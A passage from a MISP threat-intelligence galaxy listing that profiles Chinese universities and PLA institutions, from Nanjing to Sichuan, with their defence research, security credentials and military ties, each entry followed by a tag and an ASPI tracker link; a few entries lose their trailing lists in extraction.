The tag is: misp-galaxy:china-defence-universities="Nanjing University of Aeronautics and Astronautics (南京航空航天大学)"

Table 916. Table References

Links

https://unitracker.aspi.org.au/universities/nanjing-university-of-aeronautics-and-astronautics

Nanjing University of Posts and Telecommunications (南京邮电大学)

NJUPT was initially ‘one of the earliest institutions devoted to training communications personnel for the Chinese Communist Party and red army’. Since then, NJUPT has evolved from a training college to a civilian university that offers undergraduate, post-graduate and doctoral degrees in various communications and engineering disciplines. NJUPT holds secret-level security credentials, allowing it to participate in classified defence research projects. Key areas of research at the university include:

The tag is: misp-galaxy:china-defence-universities="Nanjing University of Posts and Telecommunications (南京邮电大学)"

Table 917. Table References

Links

https://unitracker.aspi.org.au/universities/nanjing-university-of-posts-and-telecommunications

Nanjing University of Science and Technology (南京理工大学)

NJUST is one of the ‘Seven Sons of National Defence’ administered by the Ministry of Industry and Information Technology. Together with Beijing Institute of Technology, it was ranked as China’s top university for armaments science in 2017. Roughly 16% of the university’s graduates in 2018 who found employment were working in the defence sector. NJUST is a member of the B8 Cooperation Innovation Alliance (B8协同创新联盟 or 中国兵器协同创新联盟), a group of eight Chinese research institutions specialising in weapons science: the ‘B’ in ‘B8’ stands for the Chinese word for armaments, bingqi (兵器). Indicative of the university’s high level of involvement in defence research, in 2013 a disused laboratory on its campus exploded, killing one, after workers disturbed a cache of explosives. NJUST has a collaborative relationship with a PLA signals intelligence research institute, involving cooperation on unmanned combat platforms and information security.

The tag is: misp-galaxy:china-defence-universities="Nanjing University of Science and Technology (南京理工大学)"

Table 918. Table References

Links

https://unitracker.aspi.org.au/universities/nanjing-university-of-science-and-technology

National Defense University (中国人民解放军国防大学)

NDU is the PLA’s ‘premier’ institution for training in military theory, strategy, operations and political work, which can have its history traced back to the era of Mao Zedong’s peasant-led red army in 1927. The university is devoted to training the PLA’s officer corps in preparation for senior leadership positions. Given this focus on the softer skills of PLA administration, the National Defense University does not have as strong a focus on hard science as its counterpart, the National University of Defense Technology.

The tag is: misp-galaxy:china-defence-universities="National Defense University (中国人民解放军国防大学)"

Table 919. Table References

Links

https://unitracker.aspi.org.au/universities/national-defense-university

National University of Defense Technology (中国人民解放军国防科技大学)

In 2017, NUDT was reformed and placed in charge of the Institute of International Relations in Nanjing, the National Defense Information Institute in Wuhan, the Xi’an Communications College, the Electrical Engineering Institute in Hefei, and the College of Meteorology and Oceanography in Nanjing. The Institute of International Relations in Nanjing is a key training centre for intelligence officers. NUDT is known for its research on supercomputers, autonomous vehicles, hypersonic missiles and China’s Beidou Navigation Satellite System. The university developed the Tianhe-2A supercomputer at the National Supercomputing Center in Guangzhou, the world’s fastest supercomputer from 2013 to 2016. NUDT’s Tianhe-1A supercomputer is based at Hunan University’s National Supercomputing Center Changsha (国家超级计算长沙中心). For over a decade, NUDT has aggressively leveraged overseas expertise and resources to build its capabilities. The Australian Strategic Policy Institute’s International Cyber Policy Centre’s October 2018 report ‘Picking flowers, making honey: The Chinese military’s collaboration with foreign universities’ documented and analysed NUDT’s overseas presence. The report found that by 2013 the university had sent over 1,600 of its professors and students to study and work abroad. Universities in the United States, the United Kingdom, Australia, Canada, Singapore, the Netherlands and Germany engage in some of the highest levels of collaboration with NUDT. Some of NUDT’s leading experts on drone swarms, hypersonic missiles, supercomputers, radars, navigation and quantum physics have been sent to study or work abroad. Defected Chinese spy Wang Liqiang claimed in 2019 that NUDT’s ‘Intelligence Center’ sent him fake passports for his mission to interfere in Taiwanese politics. This indicates that the university plays an important role in supporting China’s overseas intelligence activity. NUDT also works with foreign technology companies.
Google and Microsoft have both worked with and trained NUDT scientists.

The tag is: misp-galaxy:china-defence-universities="National University of Defense Technology (中国人民解放军国防科技大学)"

Table 920. Table References

Links

https://unitracker.aspi.org.au/universities/national-university-of-defense-technology

Naval Command College (中国人民解放军海军指挥学院)

The Naval Command College is an institution that provides education and training for naval officers in a variety of disciplines such as military thought, strategic studies, intelligence training and political work along with military operations, tactics and campaigns. The college plays a crucial role in improving the quality of PLA Navy personnel, as well as providing combined arms training for mid-career political commissars, logistics officers and equipment officers. The college serves to improve strategic and tactical thinking in the PLA Navy by hosting the Naval Campaigns and Tactics Center Laboratory (海军战役战术中心实验室) and producing research that looks at operationalising new training and command systems. It is the PLA-N’s last remaining command academic institution.

The tag is: misp-galaxy:china-defence-universities="Naval Command College (中国人民解放军海军指挥学院)"

Table 921. Table References

Links

https://unitracker.aspi.org.au/universities/naval-command-college

Naval Petty Officer Academy (中国人民解放军海军士官学校)

The academy has three main departments focused on training, campus affairs and political work. It has published research on radar jamming.

The tag is: misp-galaxy:china-defence-universities="Naval Petty Officer Academy (中国人民解放军海军士官学校)"

Table 922. Table References

Links

https://unitracker.aspi.org.au/universities/naval-petty-officer-academy

Naval Research Academy (中国人民解放军海军研究院)

The Naval Research Academy was established in July 2017 following Xi Jinping’s military reforms. Main areas of study include military theory and technological research as well as the maritime environment and national defence engineering. The Naval Research Academy actively collaborates with civilian universities as part of China’s military-civil fusion program. In April 2019, delegates from the Naval Research Academy attended a meeting with officials from Xi’an Jiaotong University on co-operation directed at improving the quality assurance and technological reliability of complex armaments currently in service in the PLA Navy. Major General Li Wei from the Naval Research Academy stated that his colleagues were paying ‘very close attention to this co-operation with Xi’an Jiaotong University’ in the development and sustainment of naval equipment. The Naval Research Academy also collaborates with civilian research institutes. For example, the Institute for Industrial Military-Civil Fusion at the Research Institute of Machinery Industry Economic and Management claims to have worked with the Naval Research Academy and a number of state-owned enterprises that focus on defence technology such as China Shipbuilding Industry Corporation (CSIC) in order to develop strategies for military-civil fusion. The Naval Research Academy’s involvement in military-civil fusion is particularly notable for work on maritime information technology and equipment. In January 2019, delegates from the Naval Research Academy attended a conference hosted by the National Key Laboratory of Underwater Acoustic Science and Technology (水声技术国防科技重点实验室) and the Key Laboratory of Marine Information Acquisition and Security Industry and Information Technology (海洋信息获取与安全工业和信息化部重点实验室) of Harbin Engineering University (HEU).
The Naval Research Academy’s Liu Qingyu (刘清宇) was reported to have made a presentation on international and domestic developments in marine sonar technology at the conference. Liu Qingyu from the Naval Research Academy has a particularly strong record of engagement with civilian and military institutions for his research into marine sonar technology. In 2018, Liu delivered a presentation to the Northwestern Polytechnical University (NPU) which ‘elaborated on some of the problems facing the national coastal defence industry’ and ‘suggested areas for future research into marine acoustics.’ Both students and academics from NPU attended Liu’s presentation. Liu has also published papers on acoustic science with scholars from the Chinese Academy of Sciences, the Naval University of Engineering, and Northwestern Polytechnical University.

The tag is: misp-galaxy:china-defence-universities="Naval Research Academy (中国人民解放军海军研究院)"

Table 923. Table References

Links

https://unitracker.aspi.org.au/universities/naval-research-academy

Naval University of Engineering (中国人民解放军海军工程大学)

NUE is one of the PLA’s five comprehensive universities, which trains students in a variety of engineering and core military disciplines related to naval warfare. The university is home to two national laboratories. The National Key Laboratory for Vessel Integrated Power System Technology (舰船综合电力技术国防科技重点实验室) was established in 2010 to carry out ‘indigenous research and development’ into integrated electric propulsion (IEP) systems that power naval vessels at sea. IEP generally uses diesel generators and/or gas turbines to generate the electricity needed in order to turn propellers on large surface vessels such as guided missile destroyers or amphibious assault ships. The lab is jointly run by NUE and China Shipbuilding Industry Corporation’s (CSIC) 712th Research Institute. Rear Admiral Ma Weiming has led the National Key Laboratory for Vessel Integrated Power System Technology to develop propulsion systems for aircraft catapults, electromagnetic weapons and satellite launches. Admiral Ma has been referred to as ‘the father of China’s electromagnetic catapult system’ (中国电磁弹射之父) by official Chinese media sources. NUE’s National Defense Technology Key Laboratory of Marine Vibration and Noise (船舶振动噪声国防科技重点实验室) works on acoustic quieting technology for submarines. The lab is probably jointly run with CSIC’s 701st Research Institute, also known as China Ship Development and Design Center (中国舰船研究设计中心). Another laboratory that conducts defence research at NUE is the Nuclear Marine Propulsion Engineering Military Key Laboratory (舰船核动力工程军队重点实验室). The lab focuses on researching and training engineers in nuclear engineering for warships and submarines. Academic departments at the Naval University of Engineering include:

The tag is: misp-galaxy:china-defence-universities="Naval University of Engineering (中国人民解放军海军工程大学)"

Table 924. Table References

Links

https://unitracker.aspi.org.au/universities/naval-university-of-engineering

Navy Aviation University (中国人民解放军海军航空大学)

The Navy Aviation University was established upon the merger of the Naval Aviation Pilot Academy and the Naval Aviation Engineering University during Xi Jinping’s military reforms in 2017. The university conducts research into missile engineering, electrical engineering and automation, navigation engineering as well as air station management engineering and flight vehicle design engineering. Academic articles published by the university have looked at topics such as the PLA-N’s combat system capability and naval aviation management systems. 

The tag is: misp-galaxy:china-defence-universities="Navy Aviation University (中国人民解放军海军航空大学)"

Table 925. Table References

Links

https://unitracker.aspi.org.au/universities/navy-aviation-university

Navy Logistics Academy (中国人民解放军海军勤务学院)

The Navy Logistics Academy is an institution devoted to training naval cadets and officers specialising in logistics. The academy’s core training and research focuses on military studies, management science and economics, while specialist lines of research include logistics command management and military financial auditing. The Center for Naval Analyses (CNA) in Arlington, Virginia has noted that entry into the academy tends to occur at the mid-career level for officers in the PLA-N.

The tag is: misp-galaxy:china-defence-universities="Navy Logistics Academy (中国人民解放军海军勤务学院)"

Table 926. Table References

Links

https://unitracker.aspi.org.au/universities/navy-logistics-academy

Navy Medical University (中国人民解放军海军军医大学)

The PLA Navy Medical University, formerly known as the Second Military Medical University, was established in 1951 as a university focussed on medical research for the Chinese military.

The tag is: misp-galaxy:china-defence-universities="Navy Medical University (中国人民解放军海军军医大学)"

Table 927. Table References

Links

https://unitracker.aspi.org.au/universities/navy-medical-university

Navy Submarine Academy (中国人民解放军海军潜艇学院)

The Navy Submarine Academy is responsible for the training of submariners to crew its conventionally and nuclear-powered submarines. The academy focuses its research on subjects such as electrical and information engineering, combat simulation, underwater acoustic engineering and navigation technology along with weapons systems and launch engineering and underwater ordnance technology. The academy also offers programs in combat tactics and the underwater combat environment. The Navy Submarine Academy pursues research that may contribute to Chinese anti-submarine warfare capabilities through the Underwater Operational Environment Military Key Laboratory (水下作战环境军队重点实验室). The academy also oversees part of the  The publication record of researchers from the Navy Submarine Academy also suggests a strong interest in foreign developments in undersea warfare systems. In 2018, the Navy Submarine Academy signed a cooperative agreement with Harbin Engineering University (HEU). The agreement is directed at promoting research collaboration in subjects such as big data fusion, intelligent navigation, underwater acoustic target recognition, and underwater unmanned intelligent control systems.

The tag is: misp-galaxy:china-defence-universities="Navy Submarine Academy (中国人民解放军海军潜艇学院)"

Table 928. Table References

Links

https://unitracker.aspi.org.au/universities/navy-submarine-academy

North China Institute of Aerospace Engineering (北华航天工业学院)

NCIAE specialises in aerospace technology and engineering. The university is primarily run by the Hebei Provincial Government, together with the State Administration of Science, Technology and Industry for National Defense, China Aerospace Science and Technology Corporation (CASC), and China Aerospace Science and Industry Corporation (CASIC). NCIAE appears to be a major training center for CASC and CASIC, state-owned defence conglomerates that dominate China’s missile and satellite sector. NCIAE runs at least two research and development centres with CASC and was involved in the development of the Shenzhou spacecraft, Long March rockets and the DFH-5 satellite platform. In 2003, the Hebei Provincial Government, CASC and CASIC signed an agreement to jointly support NCIAE (pictured below, courtesy of NCIAE).

The tag is: misp-galaxy:china-defence-universities="North China Institute of Aerospace Engineering (北华航天工业学院)"

Table 929. Table References

Links

https://unitracker.aspi.org.au/universities/north-china-institute-of-aerospace-engineering

North China University of Science and Technology (华北理工大学)

NCST was founded in 2010 and focuses on metallurgy and materials science. The university has engaged in growing levels of defence research since coming under the supervision of defence industry agency SASTIND in 2013. ‘Military-use critical materials’ has been designated as a key defence research area at NCST.

The tag is: misp-galaxy:china-defence-universities="North China University of Science and Technology (华北理工大学)"

Table 930. Table References

Links

https://unitracker.aspi.org.au/universities/north-china-university-of-science-and-technology

North University of China (中北大学)

NUC is a civilian university that specialises in defence research. It is jointly administered by the Shanxi Provincial Government and defence industry agency SASTIND. The university traces its roots back to an ordnance school established by the Eighth Route Army in 1941, and defence research is central to its identity. According to NUC’s website, ‘Our university has long established excellent and cooperative relationships with Central Military Commission departments, SASTIND, Norinco Group, China South Industries Group, China Aerospace Science and Technology Group, China Aerospace Science and Industry Group, and our graduates are spread across different areas in defence industry.’ Approximately 2000 of its graduates enter the defence industry each year. NUC specialises in testing and developing weapons, including tanks, missiles and explosives. Its Underground Target Damage Technology National Defense Key Subject Laboratory reportedly runs the only underground shooting range in a Chinese university. The university is a member of the B8 Cooperation Innovation Alliance (B8协同创新联盟 or 中国兵器协同创新联盟), a group of eight Chinese research institutions that specialize in armament science: the ‘B’ in ‘B8’ stands for the Chinese word for armaments, bingqi (兵器).

The tag is: misp-galaxy:china-defence-universities="North University of China (中北大学)"

Table 931. Table References

Links

https://unitracker.aspi.org.au/universities/north-university-of-china

Northeastern University (东北大学)

NEU is a major civilian university subordinate to the Ministry of Education. The university hosts three national laboratories, all of which are related to industrial manufacturing technology. NEU engages in growing levels of defence research. It holds secret-level security credentials allowing it to participate in classified weapons projects and hosts the defence-focused Key Laboratory of Aerodynamic Equipment Vibration and Control. In 2018, NEU was approved to build a further five laboratories that could be involved in future defence or security-related research. In 2019, NEU joined the Shenyang Aircraft Design Institute Collaborative Innovation Alliance (沈阳飞机设计研究所协同创新联盟), a group of universities and institutes, led by defence conglomerate AVIC, that are involved in the development of military aircraft. NEU also runs a National Defense Science and Technology Development Research Institute (国防科技发展研究院). In 2019, the institute’s senior deputy director was awarded a China Industry-University-Research Cooperation Military-Civil Fusion Prize.

The tag is: misp-galaxy:china-defence-universities="Northeastern University (东北大学)"

Table 932. Table References

Links

https://unitracker.aspi.org.au/universities/northeastern-university

Northwest Institute of Nuclear Technology (西北核技术研究所)

NINT is one of China’s main sites of nuclear technology research. While the Chinese Academy of Engineering Physics is believed to be China’s only manufacturer of nuclear warheads, NINT likely plays a supporting role in research for nuclear weapons. It is especially active in research on lasers, which can be used in nuclear fusion reactors or weapons. Aside from nuclear technology, NINT carries out research on topics including electronics, information science, materials science, control science and chemistry. NINT has partnerships with several institutes in the Chinese Academy of Sciences, Xiangtan University, Northwestern Polytechnical University, and Xi’an Jiaotong University.

The tag is: misp-galaxy:china-defence-universities="Northwest Institute of Nuclear Technology (西北核技术研究所)"

Table 933. Table References

Links

https://unitracker.aspi.org.au/universities/northwest-institute-of-nuclear-technology

Northwestern Polytechnical University (西北工业大学)

The university is one of the ‘Seven Sons of National Defence’ subordinate to MIIT. It is heavily engaged in military research, describing itself as ‘devoted to improving and serving the national defence science and technology industry.’ NWPU’s research focuses on aviation, space and naval technology. Between 2014 and 2018, the university’s School of Mechanics, Civil Engineering and Architecture alone spent nearly RMB200 million (AUD40 million) on defence research projects. 41.25% of 2017 NWPU graduates who gained employment were working in the defence sector. NWPU is known for its development of unmanned aerial vehicles (UAVs). The only Chinese university hosting a UAV defence laboratory, NWPU produces the ASN series of UAVs through its subsidiary company, Aisheng Technology Group Co., Ltd. The Chinese military is the company’s largest customer and the company once claimed to produce 90% of China’s drones. The university has close ties to state-owned shipbuilding and aerospace conglomerates.

The tag is: misp-galaxy:china-defence-universities="Northwestern Polytechnical University (西北工业大学)"

Table 934. Table References

Links

https://unitracker.aspi.org.au/universities/northwestern-polytechnical-university

Officers College of the PAP (中国人民武装警察部队警官学院)

The Officers College of the PAP was established as an institution devoted to training officers of China’s paramilitary service in command and engineering disciplines. The college’s research focusses on combat command, command information systems engineering, philosophy, law, political education, Chinese language and literature, history, mathematics, physics, applied psychology, electrical science and technology, computer science and technology, and management science and engineering. The Officers College of the PAP is especially active in developing drone technology. On 26 June 2019, the college tested its X-Swift unmanned aerial vehicles (UAV) in a test surveillance and reconnaissance flight with special operations personnel in Sichuan. The college is also active in developing applications for drone technology. Researchers from the college have collaborated with personnel from the PLA Logistics Engineering University to publish an article in favour of deploying UAVs to southern Xinjiang for counter-terrorism missions. The researchers argue for UAVs to be deployed for regional surveillance and strike as well as search and seizure missions in Xinjiang, drawing on lessons from the US coalition against ISIS.

The tag is: misp-galaxy:china-defence-universities="Officers College of the PAP (中国人民武装警察部队警官学院)"

Table 935. Table References

Links

https://unitracker.aspi.org.au/universities/officers-college-of-the-pap

PAP NCO College (中国人民武装警察部队士官学校)

The PAP NCO College was established in 2017 following Xi Jinping’s reforms to China’s military education system. The college does not appear to engage in significant levels of defence research and focuses its attention on training enlisted personnel in China’s paramilitary service, the People’s Armed Police.

The tag is: misp-galaxy:china-defence-universities="PAP NCO College (中国人民武装警察部队士官学校)"

Table 936. Table References

Links

https://unitracker.aspi.org.au/universities/pap-nco-college

Peking University (北京大学)

PKU is considered among China’s most prestigious universities with a storied history. It is ranked as one of China’s top two academic institutions, along with Tsinghua University. Unsurprisingly, the university has been included in a number of the PRC’s educational initiatives, including as a Class A institution under the Double First-Class University program. PKU has been subject to at least two joint-supervision agreements between the Ministry of Education and defence industry agency SASTIND. These agreements, signed in 2012 and 2016, are designed to deepen the university’s involvement in defence research. PKU’s Advanced Technology Institute was founded in 2006 to oversee and develop the university’s defence research. It includes several research centres and supervises the university’s four major defence laboratories. The institute’s research covers semiconductors, nuclear technology, quantum physics, advanced materials, underwater acoustics, satellite navigation and communications, flight propulsion, aerospace engineering and microprocessors. In 2017, PKU and the Chinese Academy of Engineering Physics (CAEP), China’s nuclear weapons program, established the PKU–CAEP New Structure Center for Applied Physics and Technology (北京大学-中国工程物理研究院新体制应用物理与技术研究中心). The institution was founded on the basis of the PKU Center for Applied Physics and Technology (北京大学应用物理与技术研究中心) established with CAEP in 2007. The joint centre carries out research on materials, lasers for atomic physics applications, laser plasma physics, computer science and fluid dynamics. PKU’s report on the centre notes that it will serve China’s national defence needs and that CAEP’s deputy director emphasised it should ‘take the path of military-civil fusion’. The joint centre’s honorary director and founding director, He Xiantu, is credited as the developer of China’s first neutron bomb. PKU takes precautions for the protection of classified information. The university has an office devoted to the secure handling of classified information, hosting regular meetings and training sessions to strengthen the university’s security culture. In 2006, the university received security credentials for participation in classified defence research.

The tag is: misp-galaxy:china-defence-universities="Peking University (北京大学)"

Table 937. Table References

Links

https://unitracker.aspi.org.au/universities/peking-university

People’s Armed Police Command College (中国人民武装警察指挥学院)

The PAP Command College is an institution devoted to training officers in China’s paramilitary service, the People’s Armed Police, that was established in 1984. The college’s key subjects focus on law, engineering, military studies and management studies, but most attention is devoted to paramilitary training and political work. The PAP Command College maintains a focus on paramilitary training, but it does retain a scientific research program. Drone technology is another area of interest for the PAP Command College. The college was involved in testing the X-Swift unmanned aerial vehicle (UAV) in June 2019. Kang Jian from the college’s Scientific Research Department also attended the 2017 Drone World Congress hosted in Shenzhen.

The tag is: misp-galaxy:china-defence-universities="People’s Armed Police Command College (中国人民武装警察指挥学院)"

Table 938. Table References

Links

https://unitracker.aspi.org.au/universities/peoples-armed-police-command-college

People’s Public Security University of China (中国人民公安大学)

PPSUC was founded in July 1948. In 1984, it was developed into a full-time higher education institution with master’s and bachelor’s degree programs. In 1998, it was merged with the Chinese People’s Police University (中国人民警官大学). Its schools include a Marxism School, Law School, Law and Order School, Investigation and Anti-Terrorism School, Criminology School, Public Security Management School, International Policing and Law Enforcement School, Police Training College (which covers combat training and command and tactical training), Criminal Science and Technology School, Information Technology and Network Security School, and a Traffic Management School. PPSUC is involved in the development of technological tools for public security applications, including image recognition. For instance, the university signed an agreement with Chinese video surveillance equipment manufacturer Hikvision in 2016 to set up a joint laboratory on video image recognition technology. In 2018, it signed a strategic cooperation agreement with Xiamen Meiya Pico Information Co., a Chinese company that provides digital forensics and information security products, which included upgrading a forensics laboratory and establishing a cyber security attack and defence laboratory. The university also has cooperation agreements with numerous local government-level public security bureaus across the PRC. These include agreements on image recognition technology for local public security bureaus and joint laboratories. For instance, in 2018, alongside the Nanshan sub-bureau of Shenzhen Public Security Bureau and the artificial intelligence companies SenseTime and Shenzhen Yuantian Lifei, it signed a strategic cooperation agreement on applying video recognition and the establishment of a joint laboratory.

The tag is: misp-galaxy:china-defence-universities="People’s Public Security University of China (中国人民公安大学)"

Table 939. Table References

Links

https://unitracker.aspi.org.au/universities/peoples-public-security-university-of-china

Railway Police College (铁道警察学院)

The Railway Police College is China’s only institution of higher learning devoted to training specialists responsible for securing the Chinese railway network. In 2017, the college graduated over 1,000 personnel trained in disciplines such as surveillance studies, political security studies and safety management studies.

The tag is: misp-galaxy:china-defence-universities="Railway Police College (铁道警察学院)"

Table 940. Table References

Links

https://unitracker.aspi.org.au/universities/railway-police-college

Renmin University (人民大学)

Renmin University is subordinate to the Ministry of Education and also supported by the Beijing Municipal Government. Its focus is in the humanities and social sciences. Although the university does not appear to have ties with the national defense industry, it was placed on the US Government’s Unverified List in April 2019, which places restrictions on US exports to the university. Entities are added to the Unverified List if the US Government is unable to satisfactorily carry out end-user checks on them to ensure compliance with export licenses.

The tag is: misp-galaxy:china-defence-universities="Renmin University (人民大学)"

Table 941. Table References

Links

https://unitracker.aspi.org.au/universities/renmin-university

Rocket Force Command College (中国人民解放军火箭指挥学院)

The Rocket Force Command College is the PLA’s premier institute devoted to training cadets and early-to-mid career officers in conventional and nuclear missile campaigns. Candidates require understanding of battlefield command, management and campaign tactics prior to entry into the college. The college then builds on this knowledge by providing specialist training for missile campaigns.

The tag is: misp-galaxy:china-defence-universities="Rocket Force Command College (中国人民解放军火箭指挥学院)"

Table 942. Table References

Links

https://unitracker.aspi.org.au/universities/rocket-force-command-college

Rocket Force Research Institute (中国人民解放军火箭军研究院)

The Rocket Force Research Institute develops nuclear and conventional ballistic missiles, carrying out research on warhead, guidance and control technology. It appears to be the successor to the PLA Second Artillery Equipment Academy (火箭军装备研究院) and the Rocket Force Equipment Academy (火箭军装备研究院). The institute reportedly hosts two national-level defence laboratories. It also has a strategic cooperation agreement with Beijing Institute of Technology, which hosts two state key laboratories that study impacts and explosions.

The tag is: misp-galaxy:china-defence-universities="Rocket Force Research Institute (中国人民解放军火箭军研究院)"

Table 943. Table References

Links

https://unitracker.aspi.org.au/universities/rocket-force-research-institute

Rocket Force Sergeant School (中国人民解放军火箭军士官学校)

The Rocket Force Officer College is an institution devoted to training military personnel for China’s tactical and strategic missile forces that was established after Xi Jinping’s military reforms in 2017. The college’s focus is on providing technical training to personnel in the PLARF’s missile systems. However, the college has also produced research on underground engineering which would be useful in hardening bases for missile strikes.

The tag is: misp-galaxy:china-defence-universities="Rocket Force Sergeant School (中国人民解放军火箭军士官学校)"

Table 944. Table References

Links

https://unitracker.aspi.org.au/universities/rocket-force-sergeant-school

Rocket Force University of Engineering (中国人民解放军火箭军工程大学)

RFUE is the PLA strategic missile force’s leading institution for training technical and scientific talent. Students entering the university tend to be university graduates and career members of the PLA Rocket Force. Defence research conducted by the RFUE focuses on building resilience and capabilities for conventional and nuclear missile strikes. RFUE hosts the Missile Testing and Control Virtual Simulation Experimental Teaching Center (导弹测试与控制虚拟仿真实验教学中心). The university’s key areas of research include:

The tag is: misp-galaxy:china-defence-universities="Rocket Force University of Engineering (中国人民解放军火箭军工程大学)"

Table 945. Table References

Links

https://unitracker.aspi.org.au/universities/rocket-force-university-of-engineering

Shandong University (山东大学)

SDU is subordinate to the Ministry of Education. Since 2016, it has also been supervised by defence industry agency SASTIND as part of a program to expand universities’ involvement in defence research and training. SDU has pursued greater involvement in defence research since at least 2006, when it established a national defence research institute to coordinate relevant work across the university. Shortly afterwards, it received secret-level security credentials allowing it to participate in research and production for classified weapons and defence technology projects. In 2008, it was recognised as one of Shandong Province’s 10 outstanding defence industry units. SDU collaborates with the Chinese Academy of Engineering Physics, China’s nuclear warheads development facility, on topics including the development of crystals that are used in the study of nuclear explosions and research on fusion ignition.

The tag is: misp-galaxy:china-defence-universities="Shandong University (山东大学)"

Table 946. Table References

Links

https://unitracker.aspi.org.au/universities/shandong-university

Shandong University of Technology (山东理工大学)

SDUT specialises in engineering and carries out growing levels of defence research. In 2018, SDUT became the only university in Shandong Province jointly supervised by defence industry agency SASTIND besides Shandong University. This indicates that SDUT’s involvement in defence research and links to the defence industry will grow in coming years. SASTIND has specifically indicated its intention to build up advanced materials and advanced manufacturing technology as areas of defence research at SDUT. SDUT has carried out research on mechatronic engineering for the defence industry, and developed a non-destructive testing system for ceramic antenna covers on missiles.

The tag is: misp-galaxy:china-defence-universities="Shandong University of Technology (山东理工大学)"

Table 947. Table References

Links

https://unitracker.aspi.org.au/universities/shandong-university-of-technology

Shanghai Jiao Tong University (上海交通大学)

SJTU is directly under the administration of the MOE. In 2016 it also came under the supervision of defence industry agency SASTIND as part of a ‘joint construction’ agreement between the MOE and SASTIND. The university has at least three laboratories focused on defense research relating to materials science, ships and hydrodynamics. The defence labs have established substantial collaborative research and talent development relationships with hydrodynamics research groups at universities including MIT, Cornell, and the Danish Technical University. One of the university’s strongest departments is computer science. Its computer science program has garnered support from American tech companies such as Cisco Systems and Microsoft, which collaborated on establishing a laboratory for intelligent computing and intelligent systems at the university. In particular, the School of Information Security Engineering has ties to the PLA through its dean and chief professor, who both previously worked for the PLA. SJTU also has ties to the PLA Unit 61398, a cyber espionage unit that has been implicated in cyber attacks on the United States. SJTU is also known for its involvement in maritime research. The School of Naval Architecture, Ocean & Civil Engineering cooperates extensively with other universities from around the world as well as with many domestic industrial enterprises, such as defence conglomerates CSIC and CASC. The school is the lead unit of the High-tech Ship and Deep-Sea Development Equipment Collaborative Innovation Center (高新船舶与深海开发装备协同创新中心), where it has contributed to assisting the PLA Navy’s transition to offshore defense operations.

The tag is: misp-galaxy:china-defence-universities="Shanghai Jiao Tong University (上海交通大学)"

Table 948. Table References

Links

https://unitracker.aspi.org.au/universities/shanghai-jiaotong-university

Shanghai University (上海大学)

SHU is engaged in growing levels of defence research. In 2016, the Shanghai Municipal Government and defence industry agency SASTIND agreed to jointly supervise and support its participation in defence research. Shanghai University has begun building up its capability in defence research in areas such as unmanned surface vehicles, materials for missiles, and microwave technology. It holds secret-level security credentials, allowing it to participate in classified defence technology projects. Shanghai University’s Research Institute of Unmanned Surface Vehicle Engineering researches and produces unmanned surface vessels, some of which are for the China Maritime Safety Administration.

The tag is: misp-galaxy:china-defence-universities="Shanghai University (上海大学)"

Table 949. Table References

Links

https://unitracker.aspi.org.au/universities/shanghai-university

Shenyang Aerospace University (沈阳航空航天大学)

SAU is the only university formally under the supervision of China’s military aircraft manufacturer, AVIC. SAU engages in high levels of defence research and describes itself as a base for training talent in national defence science and technology. Serving China’s military aviation industry is what SAU refers to as its ‘glorious tradition’. Many of China’s military aircraft are designed and built in Shenyang, which is home to AVIC subsidiaries Shenyang Aircraft Design Institute and Shenyang Aircraft Corporation. SAU and AVIC work closely together, including through a joint research institute.

The tag is: misp-galaxy:china-defence-universities="Shenyang Aerospace University (沈阳航空航天大学)"

Table 950. Table References

Links

https://unitracker.aspi.org.au/universities/shenyang-aerospace-university

Shenyang Ligong University (沈阳理工大学)

SYLU is a civilian university that specialises in defence research. The university’s primary areas of defence research are armament science, information and communications engineering, control science, materials science and mechanical engineering. Apart from Xi’an Technological University, SYLU is the only Chinese civilian university supervised by state-owned arms manufacturers Norinco Group and China South Industries Group. In 2016, it also came under the supervision of defence industry agency SASTIND. SYLU is a member of the B8 Cooperation Innovation Alliance (B8协同创新联盟 or 中国兵器协同创新联盟), a group of eight Chinese research institutions that specialize in armament science; the ‘B’ in ‘B8’ stands for the Chinese word for armaments, bingqi (兵器). The university runs a weapons museum on its campus. Furthermore, SYLU is a member of the Liaoning Military-Civil Fusion Arms Industry-College Alliance (辽宁军民融合(兵工)产业校企联盟) and SYLU’s president doubles as chairman of the alliance. This indicates close ties between SYLU and China’s arms industry.

The tag is: misp-galaxy:china-defence-universities="Shenyang Ligong University (沈阳理工大学)"

Table 951. Table References

Links

https://unitracker.aspi.org.au/universities/shenyang-ligong-university

Shenzhen University (深圳大学)

SZU is the primary university in China’s rapidly growing technology hub, Shenzhen. The university does not appear to engage in high levels of defence research outside of its national defence laboratory on automatic target recognition. The laboratory was founded in 2001, is overseen by the PLA and SASTIND, and is headed by the university’s former president.

The tag is: misp-galaxy:china-defence-universities="Shenzhen University (深圳大学)"

Table 952. Table References

Links

https://unitracker.aspi.org.au/universities/shenzhen-university

Shijiazhuang Tiedao University (石家庄铁道大学)

STDU specializes in transportation science, engineering and information technology. Its predecessor was the PLA Railway Engineering College. Since 2013, STDU has also been supervised by defence industry agency SASTIND through an arrangement designed to expand the university’s involvement in defense-related research and training. STDU has secret-level security credentials, allowing it to participate in classified defense technology research. STDU is home to the National Defense Transportation Research Institute (国防交通研究所), which is the only civilian university research institute that specializes in national defense transportation research. STDU is also home to the Institute of Complex Networks and Visualisations (复杂网络与可视化研究所), which develops military-use information processing software including remote-control systems for aerospace applications.

The tag is: misp-galaxy:china-defence-universities="Shijiazhuang Tiedao University (石家庄铁道大学)"

Table 953. Table References

Links

https://unitracker.aspi.org.au/universities/shijiazhuang-tiedao-university

Sichuan University (四川大学)

Sichuan University (SCU) is a leading Chinese university subordinate to the Ministry of Education. In 2011 and again in 2016, SCU was the subject of joint construction agreements between the MOE and defence industry agency SASTIND designed to increase its involvement in defence research. The university hosts at least three laboratories that focus on defence research and has a close relationship with the Chinese Academy of Engineering Physics (CAEP), the PRC’s primary nuclear warheads research facility. SCU’s Institute of Atomic and Molecular Physics and CAEP jointly established the Institute of Atomic and Molecular Engineering and the Institute of High Temperature and High Pressure Physics. In 2012, SCU was added to the US BIS Entity List as an alias of CAEP, implying that it acts as a proxy for the facility. A 2011 study by American think tank Project 2049 concluded that a PLA signals intelligence unit ‘likely maintain a close, mutually supportive relationship with related organizations in Chengdu, such as Sichuan University’s Information Security and Network Attack and Defense Laboratory (四川大学信息安全及网络攻防研究室).’

The tag is: misp-galaxy:china-defence-universities="Sichuan University (四川大学)"

Table 954. Table References

Links

https://unitracker.aspi.org.au/universities/sichuan-university

Soochow University (苏州大学)

